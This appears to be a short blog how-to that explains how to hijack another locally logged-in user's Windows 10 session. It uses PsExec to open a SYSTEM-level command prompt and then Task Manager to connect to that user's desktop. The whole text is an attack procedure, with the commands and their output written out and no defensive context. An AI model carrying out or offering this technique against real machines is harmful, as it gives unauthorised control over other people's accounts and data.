How to Hijack Windows 10 Session?


Purpose: To hijack a local windows session (any user)
Requirements: Local administrator rights
Tools: PsExec

Even with administrator rights, you can not impersonate (or hijack) a another user. With this attack you gain full control over a locally logged user account.


Download SysInternal’s PsExec tool from here. Extract it to a folder of your choice and launch the elevated command prompt:

> cd C:\SysinternalsSuite
> PsExec.exe -i -s cmd.exe
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals -

Change to a newly launched command prompt:

> whoami
nt authority\system
> taskmgr

Select the logged in user in the Task Manager and connect to the user’s desktop.


Leave a Reply

Your email address will not be published. Required fields are marked *